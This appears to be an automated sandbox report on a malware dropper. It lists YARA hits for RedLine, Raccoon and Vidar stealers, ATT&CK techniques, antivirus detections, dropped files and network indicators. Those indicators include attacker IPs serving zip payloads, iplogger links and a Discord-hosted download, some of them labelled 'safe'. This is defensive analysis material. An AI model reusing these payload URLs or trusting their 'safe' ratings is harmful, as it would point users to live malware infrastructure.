Source: Yara match	File source: 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000000.380265501.00000000009F2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: namdoitntn.exe PID: 8632, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: safert44.exe PID: 8784, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: jshainx.exe PID: 8908, type: MEMORYSTR
Source: Yara match	File source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe, type: DROPPED

Yara detected CryptOne packer

Source: Yara match

File source: 00000012.00000002.396184896.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected Raccoon Stealer v2

Source: Yara match	File source: 15.2.F0geI.exe.2080e67.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.kukurzka9000.exe.22b0174.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.kukurzka9000.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.kukurzka9000.exe.22b0174.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.F0geI.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.3.F0geI.exe.2090000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.F0geI.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.kukurzka9000.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.3.F0geI.exe.2090000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.F0geI.exe.2080e67.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000003.404710161.000000000062F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.469595430.000000000062B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.380590227.0000000000633000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.405187438.000000000062F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.422956483.000000000062A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.474014506.0000000002080000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.362320547.0000000002090000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.400767389.000000000062E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.402599469.000000000062F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.394907312.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.396184896.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.386373584.0000000000631000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.462450390.0000000000400000.00000040.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.403718026.000000000062F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Yara detected Vidar stealer

Source: Yara match	File source: Process Memory Space: real.exe PID: 8684, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: brokerius.exe PID: 8968, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Windows Management Instrumentation	1 Scheduled Task/Job	11 Process Injection	11 Disable or Modify Tools	1 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	13 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	2 Native API	1 Registry Run Keys / Startup Folder	1 Scheduled Task/Job	1 Deobfuscate/Decode Files or Information	1 Input Capture	1 Account Discovery	Remote Desktop Protocol	3 Data from Local System	Exfiltration Over Bluetooth	22 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	1 Scheduled Task/Job	Logon Script (Windows)	1 Registry Run Keys / Startup Folder	131 Obfuscated Files or Information	1 Credentials in Registry	4 File and Directory Discovery	SMB/Windows Admin Shares	1 Input Capture	Automated Exfiltration	1 Non-Standard Port	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	32 Software Packing	NTDS	54 System Information Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	4 Non-Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	221 Security Software Discovery	SSH	Keylogging	Data Transfer Size Limits	115 Application Layer Protocol	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	3 Masquerading	Cached Domain Credentials	2 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	2 Virtualization/Sandbox Evasion	DCSync	12 Process Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	11 Process Injection	Proc Filesystem	1 Application Window Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	1 Rundll32	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Invalid Code Signature	Network Sniffing	1 Remote System Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
9n6ctoq7cn.exe	56%	Virustotal		Browse
9n6ctoq7cn.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Program Files (x86)\Company\NewProduct\jshainx.exe	100%	Avira	HEUR/AGEN.1251247
C:\Program Files (x86)\Company\NewProduct\me.exe	100%	Avira	HEUR/AGEN.1250598
C:\Program Files (x86)\Company\NewProduct\real.exe	100%	Avira	HEUR/AGEN.1250598
C:\Program Files (x86)\Company\NewProduct\brokerius.exe	100%	Avira	HEUR/AGEN.1250598
C:\Program Files (x86)\Company\NewProduct\safert44.exe	100%	Avira	HEUR/AGEN.1203016
C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe	100%	Avira	HEUR/AGEN.1251247
C:\Program Files (x86)\Company\NewProduct\jshainx.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Company\NewProduct\me.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Company\NewProduct\real.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Company\NewProduct\F0geI.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Company\NewProduct\brokerius.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Company\NewProduct\safert44.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Company\NewProduct\ordo_sec666.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Company\NewProduct\F0geI.exe	64%	Metadefender		Browse
C:\Program Files (x86)\Company\NewProduct\F0geI.exe	96%	ReversingLabs	Win32.Ransomware.StopCrypt
C:\Program Files (x86)\Company\NewProduct\brokerius.exe	58%	ReversingLabs	Win32.Infostealer.Convagent
C:\Program Files (x86)\Company\NewProduct\captain09876.exe	37%	Metadefender		Browse
C:\Program Files (x86)\Company\NewProduct\captain09876.exe	38%	ReversingLabs	ByteCode-MSIL.Downloader.Seraph
C:\Program Files (x86)\Company\NewProduct\jshainx.exe	46%	Metadefender		Browse
C:\Program Files (x86)\Company\NewProduct\jshainx.exe	100%	ReversingLabs	ByteCode-MSIL.Trojan.RedLineStealer
C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe	44%	ReversingLabs	Win32.Trojan.RaccoonSteal
C:\Program Files (x86)\Company\NewProduct\me.exe	41%	ReversingLabs	Win32.Infostealer.Convagent
C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe	88%	ReversingLabs	ByteCode-MSIL.Trojan.RedLineStealer
C:\Program Files (x86)\Company\NewProduct\ordo_sec666.exe	45%	Metadefender		Browse
C:\Program Files (x86)\Company\NewProduct\ordo_sec666.exe	42%	ReversingLabs	Win32.Trojan.Generic
C:\Program Files (x86)\Company\NewProduct\safert44.exe	80%	ReversingLabs	ByteCode-MSIL.Infostealer.RedLine
C:\Users\user\AppData\LocalLow\freebl3.dll	0%	Metadefender		Browse
C:\Users\user\AppData\LocalLow\freebl3.dll	0%	ReversingLabs
C:\Users\user\AppData\LocalLow\mozglue.dll	0%	Metadefender		Browse
C:\Users\user\AppData\LocalLow\mozglue.dll	0%	ReversingLabs
C:\Users\user\AppData\LocalLow\msvcp140.dll	0%	Metadefender		Browse
C:\Users\user\AppData\LocalLow\msvcp140.dll	0%	ReversingLabs
C:\Users\user\AppData\LocalLow\nss3.dll	0%	Metadefender		Browse
C:\Users\user\AppData\LocalLow\nss3.dll	0%	ReversingLabs
C:\Users\user\AppData\LocalLow\softokn3.dll	0%	Metadefender		Browse
C:\Users\user\AppData\LocalLow\softokn3.dll	0%	ReversingLabs

Unpacked PE Files

Source	Detection	Scanner	Label	Download
29.0.me.exe.cf0000.0.unpack	100%	Avira	HEUR/AGEN.1250598	Download File
23.0.real.exe.d0000.0.unpack	100%	Avira	HEUR/AGEN.1250598	Download File
26.2.brokerius.exe.b60000.0.unpack	100%	Avira	HEUR/AGEN.1250598	Download File
21.0.namdoitntn.exe.9f0000.0.unpack	100%	Avira	HEUR/AGEN.1251247	Download File
26.0.brokerius.exe.b60000.0.unpack	100%	Avira	HEUR/AGEN.1250598	Download File
15.2.F0geI.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
25.0.jshainx.exe.a90000.0.unpack	100%	Avira	HEUR/AGEN.1234957	Download File
24.0.safert44.exe.fa0000.0.unpack	100%	Avira	HEUR/AGEN.1203016	Download File
0.3.9n6ctoq7cn.exe.2a0d014.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
18.2.kukurzka9000.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
23.2.real.exe.d0000.0.unpack	100%	Avira	HEUR/AGEN.1250598	Download File
29.2.me.exe.cf0000.0.unpack	100%	Avira	HEUR/AGEN.1250598	Download File

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://tempuri.org/Entity/Id12Response	0%	URL Reputation	safe
http://tempuri.org/	0%	URL Reputation	safe
http://tempuri.org/Entity/Id2Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id15V	0%	URL Reputation	safe
http://tempuri.org/Entity/Id21Response	0%	URL Reputation	safe
http://77.91.103.222/	0%	Virustotal		Browse
http://77.91.103.222/	0%	Avira URL Cloud	safe
http://77.91.103.222/8938201687.zipx	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id15Response	0%	URL Reputation	safe
http://77.91.103.222/1571B	0%	Avira URL Cloud	safe
http://88.198.122.116:80/2551251222.ziph	0%	Avira URL Cloud	safe
https://api.ip.sb/ip	0%	URL Reputation	safe
http://77.91.103.222:80/8938201687.ziph	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id24Response	0%	URL Reputation	safe
http://62.204.41.126:80	100%	Avira URL Cloud	malware
http://77.91.103.222:80/8938201687.zip	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id5Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id10Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id8Response	0%	URL Reputation	safe
https://cutt.ly	0%	Avira URL Cloud	safe
https://mas.to/	0%	URL Reputation	safe
http://tempuri.org/Entity/Id13Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id22Response	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
cutt.ly	104.22.0.232	true	false	high
accounts.google.com	142.250.180.141	true	false	high
t.me	149.154.167.99	true	false	high
cdn.discordapp.com	162.159.133.233	true	false	high
iplogger.org	148.251.234.83	true	false	high
www.google.com	142.251.209.4	true	false	high
clients.l.google.com	216.58.209.46	true	false	high
dns.google	8.8.8.8	true	false	high
clients2.google.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://iplogger.org/1AFmX4	false		high
http://77.91.103.222/	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://iplogger.org/1AJmX4	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text	namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/sc/sct	namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtab	F0geI.exe, 0000000F.00000003.421251499.0000000003CBE000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.765882444.00000000044DD000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.765441627.00000000044C0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.761541749.0000000004409000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.768912087.00000000045AE000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.758795578.0000000004370000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.777831503.00000000046B0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.739330600.0000000003517000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.742995349.00000000035E8000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.761957276.0000000004426000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.769697064.00000000045CB000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.768355950.000000000426D000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.764514321.00000000041B6000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.782196306.000000000447C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.775000832.0000000004380000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.773023876.0000000004324000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.776863060.000000000439D000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.745231042.0000000003354000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.782612989.0000000004499000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.768877468.000000000428A000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.765224204.00000000041D3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk	namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	brokerius.exe, 0000001A.00000003.605445973.00000000282AF000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/08/addressing/faultL	jshainx.exe, 00000019.00000002.734536713.0000000003101000.00000004.00000800.00020000.00000000.sdmp	false		high
https://iplogger.org/1AJmX4	real.exe, 00000017.00000002.559425106.0000000027F5C000.00000004.00000800.00020000.00000000.sdmp, brokerius.exe, 0000001A.00000003.588383211.00000000282B8000.00000004.00000800.00020000.00000000.sdmp, brokerius.exe, 0000001A.00000002.681359563.0000000028594000.00000004.00000800.00020000.00000000.sdmp, 9n6ctoq7cn.exe	false		high
http://tempuri.org/Entity/Id12Response	namdoitntn.exe, 00000015.00000002.717455310.0000000002CE2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.728540207.0000000003341000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.734536713.0000000003101000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://telegram.org/img/t_logo.png	brokerius.exe, 0000001A.00000003.588632092.00000000011C0000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/intl/en_uk/chrome/https://www.google.com/intl/en_uk/chrome/https://www.google	brokerius.exe, 0000001A.00000003.588345327.00000000282AD000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.company.com/h	9n6ctoq7cn.exe, 00000000.00000003.407162187.00000000020E0000.00000004.00001000.00020000.00000000.sdmp	false		high
http://tempuri.org/	namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.728540207.0000000003341000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.734536713.0000000003101000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id2Response	namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, namdoitntn.exe, 00000015.00000002.717455310.0000000002CE2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.728540207.0000000003341000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.734536713.0000000003101000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id15V	jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1	namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id21Response	namdoitntn.exe, 00000015.00000002.717455310.0000000002CE2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.728540207.0000000003341000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.756456423.0000000003844000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.734536713.0000000003101000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.753380323.0000000003498000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap	namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	false		high
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID	namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.google.com/chrome/answer/6315198?product=	real.exe, 00000017.00000002.559425106.0000000027F5C000.00000004.00000800.00020000.00000000.sdmp, brokerius.exe, 0000001A.00000003.588383211.00000000282B8000.00000004.00000800.00020000.00000000.sdmp, brokerius.exe, 0000001A.00000002.681359563.0000000028594000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret	namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue	namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.discordapp.com/attachments/1006526153294618657/1009394950338781266/2.0.2-beta_Nwjkxkwv.j	SETUP_~1.EXE, 00000027.00000002.726536828.000000000292C000.00000004.00000800.00020000.00000000.sdmp, SETUP_~1.EXE, 00000027.00000002.726441946.0000000002928000.00000004.00000800.00020000.00000000.sdmp	false		high
http://77.91.103.222/8938201687.zipx	real.exe, 00000017.00000002.465506612.0000000000B54000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/intl/en_uk/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrows	real.exe, 00000017.00000002.559425106.0000000027F5C000.00000004.00000800.00020000.00000000.sdmp, brokerius.exe, 0000001A.00000003.588383211.00000000282B8000.00000004.00000800.00020000.00000000.sdmp, brokerius.exe, 0000001A.00000002.681359563.0000000028594000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted	namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence	namdoitntn.exe, 00000015.00000002.717455310.0000000002CE2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.728540207.0000000003341000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.734536713.0000000003101000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat/fault	namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat	namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id15Response	namdoitntn.exe, 00000015.00000002.717455310.0000000002CE2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.746495285.00000000036B0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.728540207.0000000003341000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.734536713.0000000003101000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.753380323.0000000003498000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.google.com/chrome?p=update_error	real.exe, 00000017.00000002.559425106.0000000027F5C000.00000004.00000800.00020000.00000000.sdmp, brokerius.exe, 0000001A.00000003.588383211.00000000282B8000.00000004.00000800.00020000.00000000.sdmp, brokerius.exe, 0000001A.00000002.681359563.0000000028594000.00000004.00000800.00020000.00000000.sdmp	false		high
https://iplogger.org/1AJmX49	9n6ctoq7cn.exe, 00000000.00000002.428312299.00000000006A5000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp, SETUP_~1.EXE, 00000027.00000002.724618410.00000000028F6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://iplogger.org/1AZmX4	9n6ctoq7cn.exe	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew	namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register	namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	false		high
http://77.91.103.222/1571B	real.exe, 00000017.00000002.465506612.0000000000B54000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://88.198.122.116:80/2551251222.ziph	brokerius.exe, 0000001A.00000002.640825633.00000000010FD000.00000004.00000010.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey	namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.ip.sb/ip	namdoitntn.exe, 00000015.00000000.380265501.00000000009F2000.00000002.00000001.01000000.00000007.sdmp, safert44.exe, 00000018.00000002.728540207.0000000003341000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000000.391784055.0000000000AA3000.00000002.00000001.01000000.0000000C.sdmp, jshainx.exe.0.dr	false	URL Reputation: safe	unknown
http://77.91.103.222:80/8938201687.ziph	real.exe, 00000017.00000002.460941633.000000000059D000.00000004.00000010.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
